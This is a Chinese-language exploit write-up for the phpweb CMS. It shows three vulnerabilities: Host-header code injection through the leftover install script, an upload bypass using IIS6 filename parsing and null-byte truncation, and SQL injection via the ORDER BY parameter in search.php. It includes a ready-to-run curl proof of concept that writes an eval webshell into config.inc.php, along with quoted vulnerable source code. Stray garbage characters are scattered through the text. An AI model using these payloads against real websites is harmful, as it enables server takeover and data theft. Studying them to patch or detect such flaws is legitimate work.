phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录

( F% O5 u2 b/ U, x* K4 u  A虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

分析：
3 ^5 i0 b* C+ H) G+ |

$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

! _5 @2 s/ U6 m" I6 |( g9 G                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
  m4 j7 f2 _1 d$ s' _                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
9 J# M/ ]+ ]$ @                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
1 q7 u4 ~. m8 h+ Q, z! o6 _
                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
7 f' |4 u6 U, `+ T8 l! e2 }  ~$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

& S/ w2 `+ f/ ^" A; J* Epoc：
  g! c9 c7 }+ l( z0 M" F. {5 r# p
?
- _3 c3 w1 X. g5 [" H# ^0 d1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库

——————————————————–
上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
: E* O$ Y$ @; r+ S) W8 J; n6 G

0 r; u( B* ?; n6 m<?php
    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
+ z: o3 a% s7 O- l, O+ w    NeedAuth(0);

8 S, ~: e! s0 k( L8 t' ~# F, Q, O    $dt=date("Ymd",time());
* i" R9 T  [. S+ w    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
% r2 B5 o# E9 j9 y9 |9 f, s            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
0 {' o, f9 I& R7 Y2 j" ?    }
7 U% g5 A0 D1 P, V2 x  I  J% b
    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
9 _* ?  [8 o/ y  Q; c% P2 h    echo $save_path;
    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';
4 j, E8 c  D7 y1 s* K
/ A- k' B; z0 j- I: k    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
; ]' _: T$ z) ]4 M2 B4 W
8 Q' @4 k  o" }7 o    //最大文件大小
6 e" k0 @" I8 D" t. G( [9 N/ E2 h. d    $max_size = 1000000;

8 B7 }6 ^; P3 ~% q    //更改目录权限
3 w, R  X" g, E0 F# l    @mkdir($save_path, 0777);
" F6 h4 W& _) j0 e  u
. p/ S1 G# S+ ~/ n3 Z3 Z( ^( L5 g    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名

0 t. m: `' p7 a- F5 w    //文件URL
    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
    if (empty($_FILES) === false) {

2 u  s$ o0 b* z+ r5 F            //原文件名
            $file_name = $_FILES['fileData']['name'];
3 Y) ^8 Q7 F0 m            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
. }, Q* o3 W2 ]8 [            //文件大小
            $file_size = $_FILES['fileData']['size'];
6 f2 L& D' Q+ p9 T            //检查目录
            if (@is_dir($save_path) === false) {
0 e  p- v1 r7 x0 ?: X2 Y4 X                    alert("上传目录不存在。");
  Y/ v( x2 ^5 O. i1 W            }
5 W7 Y& m' q7 {/ Z! [            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
/ s: l# R% x5 x$ a0 K* }/ j" L            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
( N+ W3 ~$ G( W5 f3 l                    alert("临时文件可能不是上传文件。");
' P4 ~8 w: w& r  ~! E! y. U  _$ @            }
            //检查文件大小
            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
9 K# J7 B6 H1 r7 v% Z- w            }
            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
5 t, V3 Q8 x3 u8 y            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);

# }0 G5 j8 c' L+ ]+ W            //检查扩展名   
9 U; a, q. N9 q' M            if (in_array($file_ext, $ext_arr) === false) {     
2 {0 h  O0 V. M  e0 P- b                    alert("上传文件扩展名是不允许的扩展名。");
            }

            //移动文件   
' c: M$ B/ U! S            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
8 R' [1 Q! o, }/ t/ A4 x7 i                    alert("上传文件失败。");
7 S7 \) e& c5 `9 H! u7 v            }
1 e: |8 J/ j1 Q; P2 R! w) V* O
            @chmod($file_path,0666);

$ o- {4 K4 X' x( K, j( e    ?>
抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
' N( \( |, V3 }( E# ~5 J
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

——————————————————
注入漏洞：
; _% u" T0 V: ?漏洞文件:search/module/search.php
# v& S) o& l. t. g* E: Z! d5 }/search/index.php?key=1&myord=1 [sqlinjection]
! R$ q% c, ^% h9 T* J$ g) }, g
% f  F' W& _) y3 B3 _2 [, U
" m" T2 ?4 y* }) U0 q, Y; P<?php
   //       ... 省略 n 行...
   //第18行:
- F* w: u- C: n           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
2 Y$ \" {: `. \% {5 p1 ]
   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:
" e. y7 v. c5 G# p5 b
   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入

   ?>
& j5 z) ?. {6 I) I$ z; @